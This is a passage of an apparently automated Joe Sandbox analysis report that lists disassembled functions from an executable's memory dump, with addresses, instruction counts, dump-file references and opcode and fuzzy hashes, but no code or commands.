                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d7e7723fbca6f0b6950c4db4c2d517912773b0df0f433e70d4b8648dc6d17aa6
                                                                                                                          • Instruction ID: a54cd1107c0135a4b373e01785cf63a94c55d1bc04c7d87e5ea8269a3d9a45b1
                                                                                                                          • Opcode Fuzzy Hash: d7e7723fbca6f0b6950c4db4c2d517912773b0df0f433e70d4b8648dc6d17aa6
                                                                                                                          • Instruction Fuzzy Hash: 00D19A3060C340DFD704EF28D88062EFBE5EB8A309F0989ADE4C587261D736D950DB92
                                                                                                                          Function 00B14487 Relevance: .4, Instructions: 389COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a9caaf0e9c08cce06c0f6a2c8de31e7b8cf080b6c2b09a29eff4b0a79cd561b2
                                                                                                                          • Instruction ID: 20131ed9ca574684c9523a8fdc27068567c3ded82cefb9288a52ed53c00644ad
                                                                                                                          • Opcode Fuzzy Hash: a9caaf0e9c08cce06c0f6a2c8de31e7b8cf080b6c2b09a29eff4b0a79cd561b2
                                                                                                                          • Instruction Fuzzy Hash: 12E1F0B5601B008FD325CF28D992B97BBE1FF06704F4488ACE4AAC7752DB35B9548B54
                                                                                                                          Function 00B46CBF Relevance: .4, Instructions: 384COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2044d7f9b8863471e468f79c9af06b69a6b8bbc4663581221cbef5a6aa496a70
                                                                                                                          • Instruction ID: de9e403697547f896942e6f04b0d8a0970e90c68ee70079ced3fc8736147fb6a
                                                                                                                          • Opcode Fuzzy Hash: 2044d7f9b8863471e468f79c9af06b69a6b8bbc4663581221cbef5a6aa496a70
                                                                                                                          • Instruction Fuzzy Hash: 30D1E336618355CFC715CF38D89062ABBE1EB8A356F094AACE895C7391DB30DA44CB91
                                                                                                                          Function 00B47AB0 Relevance: .4, Instructions: 354COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5574bf2e71cf0dafa24c23c09376897d5ee836e97c3d5d0a0c7ac0b50fe10205
                                                                                                                          • Instruction ID: e4f6c02fac556a4d46012646ae5aec9620729f10f64d202d46efb1c7b00b1f47
                                                                                                                          • Opcode Fuzzy Hash: 5574bf2e71cf0dafa24c23c09376897d5ee836e97c3d5d0a0c7ac0b50fe10205
                                                                                                                          • Instruction Fuzzy Hash: F2B1F972A483504BD724DB28CC8176BB7E9EBC4314F044AACE99997392EF35DD04C792
                                                                                                                          Function 00B0AF10 Relevance: .3, Instructions: 303COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9c6117061885288c1b39a5b943f8482e52345fd8b1a48c2f17ef7dcb0cf10c7c
                                                                                                                          • Instruction ID: deef4a004ea0e53e74ab125327952311a3fa4f8788e8be4072ad8af631046e60
                                                                                                                          • Opcode Fuzzy Hash: 9c6117061885288c1b39a5b943f8482e52345fd8b1a48c2f17ef7dcb0cf10c7c
                                                                                                                          • Instruction Fuzzy Hash: CBC17DB2A187418FC360CF28DC96BABBBE1FF85318F08492DD1D9C6242E778A155CB45
                                                                                                                          Function 00B16536 Relevance: .3, Instructions: 295COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fcc9a4a6bc96623dac779953e52b0888db4755b58c660e788d4e18bf0d625aca
                                                                                                                          • Instruction ID: c5539888a84dfbb44ce1e401c7788fb0c733efe0a493cb38e71954203aeaf60f
                                                                                                                          • Opcode Fuzzy Hash: fcc9a4a6bc96623dac779953e52b0888db4755b58c660e788d4e18bf0d625aca
                                                                                                                          • Instruction Fuzzy Hash: 8FB112B4500B408FC3258F24C981B57BBF2EF56704F54889DE8AA8BB92E735F845CB54
                                                                                                                          Function 00B47710 Relevance: .3, Instructions: 287COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 0464d22bad7f6b99ce54720223821ceb72286e9017e2683bb351b684141d7cb2
                                                                                                                          • Instruction ID: e249a1fdc78ab5992f339b5d29f3e11cae6169829ef24e9f33d895e29c5e9407
                                                                                                                          • Opcode Fuzzy Hash: 0464d22bad7f6b99ce54720223821ceb72286e9017e2683bb351b684141d7cb2
                                                                                                                          • Instruction Fuzzy Hash: 0B919C7164C301ABEB20DB15D880B6FBBE5EB89351F548C9CF48487351EB30EA40EB92
                                                                                                                          Function 00B4A0D0 Relevance: .3, Instructions: 282COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8db3b1f239c00ac229839c4bb6123cfae7b91a20e3a0c010787ba28b3ea6ac66
                                                                                                                          • Instruction ID: 323c70b2ef0a45eb54160588797f9be1114dc59cb7b626752bd6578d7c0bdff2
                                                                                                                          • Opcode Fuzzy Hash: 8db3b1f239c00ac229839c4bb6123cfae7b91a20e3a0c010787ba28b3ea6ac66
                                                                                                                          • Instruction Fuzzy Hash: 28819C342487018BD724DF28D890A2EB7F5FF89740F5589ACE586DB251E731EE10EB92
                                                                                                                          Function 00B364F0 Relevance: .2, Instructions: 246COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5176970e8090dcb0c76b3b1bf84eb99385bc074345f4d24e880356d3c3239a46
                                                                                                                          • Instruction ID: 5e567e20612c46e923ccb8fe18988622bc6f712ebc9f41bd93c68840eb2aee36
                                                                                                                          • Opcode Fuzzy Hash: 5176970e8090dcb0c76b3b1bf84eb99385bc074345f4d24e880356d3c3239a46
                                                                                                                          • Instruction Fuzzy Hash: 1A71D437B29A905BC3148D3C9C823A5BA835BE7334F3EC3B9A9B4CB3E5D5294D064240
                                                                                                                          Function 00CA0F31 Relevance: .2, Instructions: 245COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 003a2a12d35cf5dad317254713edee802ef145c99c9417b8c10cb9d476aa6131
                                                                                                                          • Instruction ID: fad636dcf786e30b414783b562d7d322569a920e37550f201fc27c007f89d50f
                                                                                                                          • Opcode Fuzzy Hash: 003a2a12d35cf5dad317254713edee802ef145c99c9417b8c10cb9d476aa6131
                                                                                                                          • Instruction Fuzzy Hash: FF7107B3A183049BE310AE3DDD85766B7DAEB98320F1A863DDAC8C3745E9395D054292
                                                                                                                          Function 00B228E9 Relevance: .2, Instructions: 244COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c1f2c39636720350733918c0498f5227edf6500329227f9a03b15bb9930997f6
                                                                                                                          • Instruction ID: a2e405fdb255cfd60e1011629d4997f39f7b997e8fa4cd4f175269bc0038c15e
                                                                                                                          • Opcode Fuzzy Hash: c1f2c39636720350733918c0498f5227edf6500329227f9a03b15bb9930997f6
                                                                                                                          • Instruction Fuzzy Hash: DB6178B45183609BD310AF14E851A2BBBF0FFA6751F04499CE8C99B261E339D910CB67
                                                                                                                          Function 00B27C00 Relevance: .2, Instructions: 243COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cb5fa2f3d7fd8c512a5da4e73de5a0878c3734a002407484e2ab9de47d35a10d
                                                                                                                          • Instruction ID: 922c6a5d621f4a91a23abc33e7927ef1cd848481b69caa259db214e42873b594
                                                                                                                          • Opcode Fuzzy Hash: cb5fa2f3d7fd8c512a5da4e73de5a0878c3734a002407484e2ab9de47d35a10d
                                                                                                                          • Instruction Fuzzy Hash: 1051C1B16882149BDB209F24EC82B7737F4EF85754F148998F9898B290FB75D801C766
                                                                                                                          Function 00B31860 Relevance: .2, Instructions: 217COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6d108e008403b3c92b59985e25fae4eb0cb21936506a5ffd7efe5999b9cc5533
                                                                                                                          • Instruction ID: 563294d69f38bc55f4faf7d5404d1ebf650ed90ad8758128e0f4b7ba4cda67f1
                                                                                                                          • Opcode Fuzzy Hash: 6d108e008403b3c92b59985e25fae4eb0cb21936506a5ffd7efe5999b9cc5533
                                                                                                                          • Instruction Fuzzy Hash: AC61BD31609301ABD714CE2CC9C072EBBEAEBC9351F78CDADE4A98B251D670DD869741
                                                                                                                          Function 00B382D0 Relevance: .2, Instructions: 215COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cad2e8153c1f17f9786ecc29c71efbd7e121b5266adf3f788af4fdc46c83bfcd
                                                                                                                          • Instruction ID: 86db4b2fb820c2cb6d247b165a8da407a908905e3404dbd1bfd4985a15445e24
                                                                                                                          • Opcode Fuzzy Hash: cad2e8153c1f17f9786ecc29c71efbd7e121b5266adf3f788af4fdc46c83bfcd
                                                                                                                          • Instruction Fuzzy Hash: 2A612527A5AB904BC315453C5C963A67AC35BE2730F3EC3E6B8B58B3E5CD6948054343
                                                                                                                          Function 00C37035 Relevance: .2, Instructions: 213COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
